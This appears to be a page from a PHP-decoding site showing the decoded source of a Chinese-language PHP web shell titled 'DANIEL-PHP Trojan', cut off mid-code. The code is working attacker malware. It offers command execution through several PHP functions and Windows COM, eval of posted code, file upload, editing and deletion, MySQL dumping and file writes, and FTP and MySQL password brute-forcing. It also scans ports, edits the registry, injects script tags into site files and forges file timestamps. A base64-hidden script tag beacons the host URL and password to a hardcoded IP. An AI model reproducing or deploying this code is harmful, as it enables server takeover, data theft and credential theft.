Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /** * ,, * @author */ header("Content-type:text/html; charset=utf-8"); ..

Decoded Output download

<?php 
 
/** 
 *  ,, 
 * @author  
 */ 
header("Content-type:text/html; charset=utf-8"); 
$admin['pass']  = "admin";  // 
$notice = "<FONT color=#ff3300></font>";  // 
$mytitle = "DANIEL-PHP Trojan..."; 
error_reporting(7); 
ob_start(); 
$mtime = explode(' ', microtime()); 
$starttime = $mtime[1] + $mtime[0]; 
@set_time_limit(0); 
$admin['check'] = "1"; 
$hidden = "44997"; 
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631"; 
$admin['jumpsecond'] = "1"; 
$alexa = "yes"; 
$admin['ftpport'] = "21"; 
$retime = "no"; 
$cmd = "cmd.exe"; 
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; 
$serverp = $admin['pass']; 
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8xOTIuMTY4LjE4OS41Ny9hYmMvdGVzdC93ZWJzaGVsbC9kYXRhLnBocD91PQ=='); 
 
$copyurll = base64_decode('Jz48L3NjcmlwdD4='); 
 
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); 
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);} 
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions"); 
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style=\"font-size: 12px; font-family: Verdana\">......<p><a href=\"".$self."\"> &gt;&gt;&gt;</a></span>";exit;} 
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}} 
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);} 
$mixdll = "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"; 
 
function shelL($command){ 
    global $windows,$disablefunctions; 
    $exec = '';$output= ''; 
    $dep[]=array('pipe','r');$dep[]=array('pipe','w'); 
    if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} 
    elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } 
    elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} 
    elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} 
    elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} 
    elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} 
    elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} 
    return $exec; 
} 
// PHPINFO 
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() ,&lt;PHP&gt;";exit; 
}if($_GET['action'] == "nowuser") {$user = get_current_user(); 
if(!$user) $user = ""; 
echo"$user"; 
exit; 
} 
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit; 
} 
if($action=="mysqldown"){ 
    $link=@mysql_connect($host,$user,$password); 
    if (!$link) { 
        $downtmp = ': ' . mysql_error(); 
    }else{ 
        $query="select load_file('".$filename."');"; 
        $result = @mysql_query($query, $link); 
        if(!$result){ 
            $downtmp = "file<br>".mysql_error(); 
        }else{ 
            while ($row = mysql_fetch_array($result)) { 
                $filename = basename($filename); 
                if($rardown=="yes"){ 
                    $zip = NEW Zip; 
                    $zipfiles[]=Array("$filename",$row[0]); 
                    $zip->Add($zipfiles,1); 
                    $code = $zip->get_file(); 
                    $filename = "".$filename.".rar"; 
                }else{ 
                    $code = $row[0]; 
                } 
                header("Content-type: application/octet-stream"); 
                header("Accept-Ranges: bytes"); 
                header("Accept-Length: ".strlen($code)); 
                header("Content-Disposition: attachment;filename=$filename"); 
                echo($code); 
                exit; 
            } 
        } 
    } 
} 
//  
if (isset($_POST['url'])) { 
    $proxycontents = @file_get_contents($_POST['url']); 
    echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b> URL </b></p></center></body>"; 
    exit; 
} 
//  
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script>alert('!')</script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;} 
} 
//  
if ($_POST['backuptype'] == 'download') { 
    @mysql_connect($servername,$dbusername,$dbpassword) or die(""); 
    @mysql_select_db($dbname) or die(""); 
    $table = array_flip($_POST['table']); 
    $result = mysql_query("SHOW tables"); 
    echo ($result) ? NULL : ": ".mysql_error(); 
 
    $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); 
    header('Content-type: application/unknown'); 
    header('Content-Disposition: attachment; filename='.$filename); 
    $mysqldata = ''; 
    while ($currow = mysql_fetch_array($result)) { 
        if (isset($table[$currow[0]])) { 
            $mysqldata.= sqldumptable($currow[0]); 
            $mysqldata.= $mysqldata."\r\n"; 
        } 
    } 
    mysql_close(); 
    exit; 
} 
 
//  
$pathname=str_replace('\\','/',dirname(__FILE__)); 
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]); 
 
//  
if (!isset($dir) or empty($dir)) { 
    $dir = "."; 
    $nowpath = getPath($pathname, $dir); 
} else { 
    $dir=$_GET['dir']; 
    $nowpath = getPath($pathname, $dir); 
} 
 
//  
$dir_writeable = (dir_writeable($nowpath)) ? "" : ""; 
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : ""; 
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\"></a>" : ""; 
 
$tb = new FORMS(); 
 
?> 
<html> 
<head> 
<meta http-equiv="Content-Type" content="text/html; charset=gb2312"> 
<style type="text/css"> 
body,td { 
    font-size: 12px; 
    background-color: #000000; 
    color: #eee; 
    margin: 1px; 
    margin-left: 1px; 
    SCROLLBAR-FACE-COLOR: #232323; 
    SCROLLBAR-HIGHLIGHT-COLOR: #232323; 
    SCROLLBAR-SHADOW-COLOR: #383838; 
    SCROLLBAR-DARKSHADOW-COLOR: #383838; 
    SCROLLBAR-3DLIGHT-COLOR: #232323; 
    SCROLLBAR-ARROW-COLOR: #FFFFFF; 
    SCROLLBAR-TRACK-COLOR: #383838; 
} 
 
a { 
    color: #ddd; 
    text-decoration: none; 
} 
 
a:hover { 
    color: red; 
    background: #000 
} 
 
.smlfont { 
    font-family: "Verdana", "Tahoma", ""; 
    font-size: "11px"; 
} 
 
.INPUT { 
    FONT-SIZE: "12px"; 
    COLOR: "#000000"; 
    BACKGROUND-COLOR: "#FFFFFF"; 
    height: "18px"; 
    border: "1px solid #666666"; 
    padding-left: "2px"; 
} 
 
.redfont { 
    COLOR: "#CA0000"; 
} 
 
.top { 
    BACKGROUND-COLOR: "#CCCCCC" 
} 
 
.firstalt { 
    BACKGROUND-COLOR: "#EFEFEF" 
} 
 
.secondalt { 
    BACKGROUND-COLOR: "#F5F5F5" 
} 
</style> 
<SCRIPT language=JavaScript> 
function CheckAll(form) { 
    for (var i=0;i<form.elements.length;i++) { 
        var e = form.elements[i]; 
        if (e.name != 'chkall') 
        e.checked = form.chkall.checked; }} 
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}} 
</SCRIPT> 
</head> 
<title><?php echo"$mytitle"?></title> 
<body style="table-layout: fixed; word-break: break-all onmouseover =" 
    window.status='modifier:  ,,' ;return 
    true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)"> 
<center> 
<?php 
//$_SERVER["DOCUMENT_ROOT"] 
$tb->tableheader(); 
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Ymd h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top'); 
$tb->tdbody('<a href="?dir='.$dirpath.'"></a> | <a href="?action=dir">Shell</a> | <a href="?action=phpenv"></a> | <a href="?action=proxy"></a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=crack"></a> | <a href="?action=mix">mix.dll</a> | <a href="?action=logout"></a>'); 
$tb->tdbody('<a href="?action=plgm"></a> | <a href="?action=downloads">Http</a> | <a href="?action=search&dir='.$dir.'"></a> | <a href="?action=eval">php</a> | <a href="?action=sql">SQL</a> | <a href="?action=mysqlfun">FuncShell</a> | <a href="?action=sqlbak">MySQL</a> | <a href="?action=SUExp">Serv-U</a>'); 
$tb->tablefooter(); 
?> 
<hr width="775" noshade> 
<table width="775" border="0" cellpadding="0"> 
<?php 
$tb->headerform(array('method'=>'GET','content'=>'<p>: '.$pathname.'<br>('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','','','submit').' ')); 
 
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>': '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); 
 
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>': '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','','','submit'))); 
 
$tb->headerform(array('content'=>': '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','','','submit'))); 
?> 
</table> 
<hr width="775" noshade> 
<?php 
/*=====================   =====================*/ 
echo "<p><b>\n"; 
//  
if (!empty($delfile)) { 
    if (file_exists($delfile)) { 
        echo (@unlink($delfile)) ? $delfile." !" : "!"; 
    } else { 
        echo basename($delfile)." !"; 
    } 
} 
 
//  
elseif (!empty($deldir)) { 
    $deldirs="$dir/$deldir"; 
    if (!file_exists("$deldirs")) { 
        echo "$deldir !"; 
    } else { 
        echo (deltree($deldirs)) ? "!" : "!"; 
    } 
} 
 
//  
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { 
    if (!empty($newdirectory)) { 
        $mkdirs="$dir/$newdirectory"; 
        if (file_exists("$mkdirs")) { 
            echo "!"; 
        } else { 
            echo (@mkdir("$mkdirs",0777)) ? "!" : "!"; 
            @chmod("$mkdirs",0777); 
        } 
    } 
} 
 
//  
elseif ($doupfile) { 
    echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "!" : "!"; 
} 
elseif($action=="mysqlup"){ 
    $filename = $_FILES['upfile']['tmp_name']; 
    if(!$filename) { 
        echo""; 
    }else{ 
        $shell = file_get_contents($filename); 
        $mysql = bin2hex($shell); 
        if(!$upname) $upname = $_FILES['upfile']['name']; 
        $shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';"; 
        $link=@mysql_connect($host,$user,$password); 
        if(!$link){ 
            echo "".mysql_error(); 
        }else{ 
            $result = mysql_query($shell, $link); 
            if($result){ 
                echo".".$host.",".$uppath."/".$upname.".."; 
            }else{ 
                echo" :".mysql_error(); 
            } 
        } 
    } 
 
} 
elseif($action=="mysqldown"){ 
    if(!empty($downtmp)) echo $downtmp; 
} 
//  
elseif ($_POST['do'] == 'doeditfile') { 
    if (!empty($_POST['editfilename'])) { 
        if(!file_exists($editfilename)) unset($retime); 
        if($time==$now) $time = @filemtime($editfilename); 
        $time2 = @date("Y-m-d H:i:s",$time); 
        $filename="$editfilename"; 
        @$fp=fopen("$filename","w"); 
        if($_POST['change']=="yes"){ 
            $filecontent = "?".">".$_POST['filecontent']."<?"; 
            $filecontent = gzdeflate($filecontent); 
            $filecontent = base64_encode($filecontent); 
            $filecontent = "<?php\n/*\n!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>"; 
        }else{ 
            $filecontent = $_POST['filecontent']; 
        } 
        echo $msg=@fwrite($fp,$filecontent) ? "!" : "!"; 
        @fclose($fp); 
        if($retime=="yes"){ 
            echo"&nbsp;:"; 
            echo $msg=@touch($filename,$time) ? "".$time2."!" : "!"; 
        } 
    } else { 
        echo "!"; 
    } 
} 
// 
elseif ($_POST['do'] == 'downloads') { 
    $contents = @file_get_contents($_POST['durl']); 
    if(!$contents){ 
        echo""; 
    } 
    elseif(file_exists($path)){ 
        echo"".$path.""; 
    }else{ 
        $fp = @fopen($path,"w"); 
        echo $msg=@fwrite($fp,$contents) ? "!" : "!"; 
        @fclose($fp); 
    } 
} 
elseif($_POST['action']=="mix"){ 
    if(!file_exists($_POST['mixto'])){ 
        $tmp = base64_decode($mixdll); 
        $tmp = gzinflate($tmp); 
        $fp = fopen($_POST['mixto'],"w"); 
        echo $msg=@fwrite($fp,$tmp) ? "!" : "!"; 
        fclose($fp); 
    }else{ 
        echo"".$_POST['mixto']."~"; 
    } 
} 
//  
elseif ($_POST['do'] == 'editfileperm') { 
    if (!empty($_POST['fileperm'])) { 
        $fileperm=base_convert($_POST['fileperm'],8,10); 
        echo (@chmod($dir."/".$file,$fileperm)) ? "!" : "!"; 
        echo "  ".$file." : ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); 
    } else { 
        echo "!"; 
    } 
} 
 
//  
elseif ($_POST['do'] == 'rename') { 
    if (!empty($_POST['newname'])) { 
        $newname=$_POST['dir']."/".$_POST['newname']; 
        if (@file_exists($newname)) { 
            echo "".$_POST['newname']." ,!"; 
        } else { 
            echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])."  ".$_POST['newname']." !" : "!"; 
        } 
    } else { 
        echo "!"; 
    } 
} 
elseif ($_POST['do'] == 'search') { 
    if(!empty($oldkey)){ 
        echo"<span class=\"redfont\">:[".$oldkey."],:"; 
        if($type2 == "getpath"){ 
            echo"."; 
        } 
        echo"</span><br><hr width=\"775\" noshade>"; 
        find($path); 
    }else{ 
        echo"???"; 
    } 
} 
elseif ($_GET['action']=='plgmok') { 
    dirtree($_POST['dir'],$_POST['mm']); 
} 
elseif ($_GET['action'] == "plgm") { 
    $action = '?action=plgmok'; 
    $gm = "<script src=http://127.0.0.1></script>"; 
    $tb->tableheader(); 
    $tb->formheader($action,''); 
    $tb->tdbody('php','center'); 
    $tb->tdbody(': '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','').'<br>'.$tb->makeinput('submit','','','submit'),'center','1','35'); 
    echo "</form>"; 
    $tb->tablefooter(); 
}//end plgm 
//  
elseif ($_POST['do'] == 'domodtime') { 
    if (!@file_exists($_POST['curfile'])) { 
        echo "!"; 
    } else { 
        if (!@file_exists($_POST['tarfile'])) { 
            echo "!"; 
        } else { 
            $time=@filemtime($_POST['tarfile']); 
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])."  ".date("Y-m-d H:i:s",$time)." !" : "!"; 
        } 
    } 
} 
 
//  
elseif ($_POST['do'] == 'modmytime') { 
    if (!@file_exists($_POST['curfile'])) { 
        echo "!"; 
    } else { 
        $year=$_POST['year']; 
        $month=$_POST['month']; 
        $data=$_POST['data']; 
        $hour=$_POST['hour']; 
        $minute=$_POST['minute']; 
        $second=$_POST['second']; 
        if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { 
            $time=strtotime("$data $month $year $hour:$minute:$second"); 
            echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])."  ".date("Y-m-d H:i:s",$time)." !" : "!"; 
        } 
    } 
} 
elseif($do =='port'){ 
    $tmp = explode(",",$port); 
    $count = count($tmp); 
    for($i=$first;$i<$count;$i++){ 
        $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); 
        if($fp) echo"".$host."".$tmp[$i]."<br>"; 
    } 
} 
/* 
  
 */ 
elseif ($do == 'crack') {// 
    if(@file_exists($passfile)){ 
        $tmp = file($passfile); 
        $count = count($tmp); 
        if(empty($onetime)){ 
            $onetime = $count; 
            $turn="1"; 
        }else{ 
            $nowturn = $turn+1; 
            $now = $turn*$onetime; 
            $tt = intval(($count/$onetime)+1); 
        } 
        if($turn>$tt or $onetime>$count){ 
            echo"~"; 
        }else{ 
            $first = $onetime*($turn-1); 
            for($i=$first;$i<$now;$i++){ 
                if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i])); 
                else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i])); 
                if($sa) 
                { 
                    $t = "".$user."".$tmp[$i].""; 
                } 
            } 
            if(!$t){ 
                echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style=\"font-size: 12px; font-family: Verdana\"><a href=\"".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">".$count."".$first."".$now."".$admin[jumpsecond]."".$onetime.". &gt;&gt;&gt;</a><br>".$type."".$tt."".$turn."</span>"; 
            } 
            else { 
                echo"$t"; 
            } 
        } 
    }else{ 
        echo""; 
    } 
} 
elseif($do =='port'){ 
    if(!eregi("-",$port)){ 
        $tmp = explode(",",$port); 
        $count = count($tmp); 
        $first = "1"; 
    }else{ 
        $tmp = explode("-",$port); 
        $first = $tmp[0]; 
        $count = $tmp[1]; 
 
    } 
    for($i=$first;$i<$count;$i++){ 
        if(!eregi("-",$port)){ 
            $fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1); 
            if($fp) echo"".$host."".$tmp[$i]."<br>"; 
        }else{ 
            $fp = @fsockopen($host, $i, $errno, $errstr, 1); 
            if($fp) echo"".$host."".$i."<br>"; 
        } 
    } 
 
} 
// MYSQL 
elseif ($connect) { 
    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { 
        echo "!"; 
        mysql_close(); 
    } else { 
        echo mysql_error(); 
    } 
} 
 
// SQL 
elseif ($_POST['do'] == 'query') { 
    @mysql_connect($servername,$dbusername,$dbpassword) or die(""); 
    @mysql_select_db($dbname) or die(""); 
    $result = @mysql_query($_POST['sql_query']); 
    echo ($result) ? "SQL!" : ": ".mysql_error(); 
    mysql_close(); 
} 
 
//  
elseif ($_POST['do'] == 'backupmysql') { 
    if (empty($_POST['table']) OR empty($_POST['backuptype'])) { 
        echo "!"; 
    } else { 
        if ($_POST['backuptype'] == 'server') { 
            @mysql_connect($servername,$dbusername,$dbpassword) or die(""); 
            @mysql_select_db($dbname) or die(""); 
            $table = array_flip($_POST['table']); 
            $filehandle = @fopen($path,"w"); 
            if ($filehandle) { 
                $result = mysql_query("SHOW tables"); 
                echo ($result) ? NULL : ": ".mysql_error(); 
                while ($currow = mysql_fetch_array($result)) { 
                    if (isset($table[$currow[0]])) { 
                        sqldumptable($currow[0], $filehandle); 
                        fwrite($filehandle,"\n\n\n"); 
                    } 
                } 
                fclose($filehandle); 
                echo " <a href=\"".$path."\" target=\"_blank\">".$path."</a>"; 
                mysql_close(); 
            } else { 
                echo ",!"; 
            } 
        } 
    } 
} 
elseif($downrar) { 
    if (!empty($dl)) { 
        if(eregi("unzipto:",$localfile)){ 
            $path = "".$dir."/".str_replace("unzipto:","",$localfile).""; 
            $zip = new Zip; 
            $zipfile=$dir."/".$dl[0]; 
            $array=$zip->get_list($zipfile); 
            $count=count($array); 
            $f=0; 
            $d=0; 
            for($i=0;$i<$count;$i++) { 
                if($array[$i][folder]==0) { 
                    if($zip->Extract($zipfile,$path,$i)>0) $f++; 
                } 
                else $d++; 
            } 
            if($i==$f+$d) echo "$dl[0] ".$path."<br>($f  $d )"; 
            elseif($f==0) echo "$dl[0] ".$path.""; 
            else echo "$dl[0] <br>( $f  $d )"; 
        }else{ 
            $zipfile=""; 
            $zip = new Zip; 
            for($k=0;isset($dl[$k]);$k++) 
            { 
                $zipfile=$dir."/".$dl[$k]; 
                if(is_dir($zipfile)) 
                { 
                    unset($zipfilearray); 
                    addziparray($dl[$k]); 
                    for($i=0;$zipfilearray[$i];$i++) 
                    { 
                        $filename=$zipfilearray[$i]; 
                        $filesize=@filesize($dir."/".$zipfilearray[$i]); 
                        $fp=@fopen($dir."/".$filename,rb); 
                        $zipfiles[]=Array($filename,@fread($fp,$filesize)); 
                        @fclose($fp); 
                    } 
                } 
                else 
                { 
                    $filename=$dl[$k]; 
                    $filesize=@filesize($zipfile); 
                    $fp=@fopen($zipfile,rb); 
                    $zipfiles[]=Array($filename,@fread($fp,$filesize)); 
                    @fclose($fp); 
                } 
            } 
            $zip->Add($zipfiles,1); 
            $code = $zip->get_file(); 
            $ck = "_QQ44997_".date("Y-m-d",time()).""; 
            if(empty($localfile)){ 
                header("Content-type: application/octet-stream"); 
                header("Accept-Ranges: bytes"); 
                header("Accept-Length: ".strlen($code)); 
                header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip"); 
                echo $code; 
                exit; 
            }else{ 
                $fp = @fopen("".$dir."/".$localfile."","w"); 
                echo $msg=@fwrite($fp,$code) ? "".$dir."/".$localfile."!" : "".$dir."!"; 
                @fclose($fp); 
            } 
        } 
    } else { 
        echo "!"; 
    } 
} 
// Shell.Application  
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) { 
//  $shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); 
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); 
    $a = $shell->ShellExecute($_POST['program'],$_POST['prog']); 
    echo ($a=='0') ? "!" : "!"; 
} 
// PHP 
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) { 
    echo " ".$_POST['phpvarname']." : ".getphpcfg($_POST['phpvarname']).""; 
} 
//  
elseif(($regread) AND !empty($_POST['readregname'])) { 
//  $shell= &new COM('WSc'.'rip'.'t.Sh'.'ell'); 
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); 
    var_dump(@$shell->RegRead($_POST['readregname'])); 
} 
 
//  
elseif(($regwrite) AND !empty($_POST['writeregname']) AND !empty($_POST['regtype']) AND !empty($_POST['regval'])) { 
//  $shell= &new COM('W'.'Scr'.'ipt.S'.'hell'); 
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); 
    $a = @$shell->RegWrite($_POST['writeregname'], $_POST['regval'], $_POST['regtype']); 
    echo ($a=='0') ? "!" : " ".$_POST['regname'].", ".$_POST['regval'].", ".$_POST['regtype']." !"; 
} 
//  
elseif(($regdelete) AND !empty($_POST['delregname'])) { 
//  $shell= &new COM('WS'.'cri'.'pt.S'.'he'.'ll'); 
    $shell= new COM('Sh'.'el'.'l.Appl'.'ica'.'tion'); 
    $a = @$shell->RegDelete($_POST['delregname']); 
    echo ($a=='0') ? "!" : " ".$_POST['delregname']." !"; 
} 
else { 
    echo "$notice"; 
    echo "<a href=\"?dir=C:/Program%20Files/\">Program</a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users/Application%20Data/Symantec/pcAnywhere\">pcAnywhere</a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users//\"></a> | <a href=\"?dir=C:/Documents%20and%20Settings/All%20Users\">AllUsers</a> | <a href=\"?dir=C:/Program Files/RhinoSoft.com/Serv-U\">Serv-U</a> | "; 
    for ($i=66;$i<=90;$i++){$drive= chr($i).':'; 
    if (is_dir($drive."/")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$drive/\" href=\"?dir=$drive/\">$drive\\</a>";} 
    } 
 
} 
 
echo "</b></p>\n"; 
/*=====================   =====================*/ 
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { 
    $tb->tableheader(); 
    ?> 
<tr bgcolor="#cccccc"> 
    <td align="center" nowrap width="27%"><b></b></td> 
    <td align="center" nowrap width="16%"><b></b></td> 
    <td align="center" nowrap width="16%"><b></b></td> 
    <td align="center" nowrap width="11%"><b></b></td> 
    <td align="center" nowrap width="6%"><b></b></td> 
    <td align="center" nowrap width="24%"><b></b></td> 
</tr> 
<FORM action="" method="POST"> 
<?php 
//  
$dirs=@opendir($dir); 
$dir_i = '0'; 
while ($file=@readdir($dirs)) { 
    $filepath="$dir/$file"; 
    $a=@is_dir($filepath); 
    if($a=="1"){ 
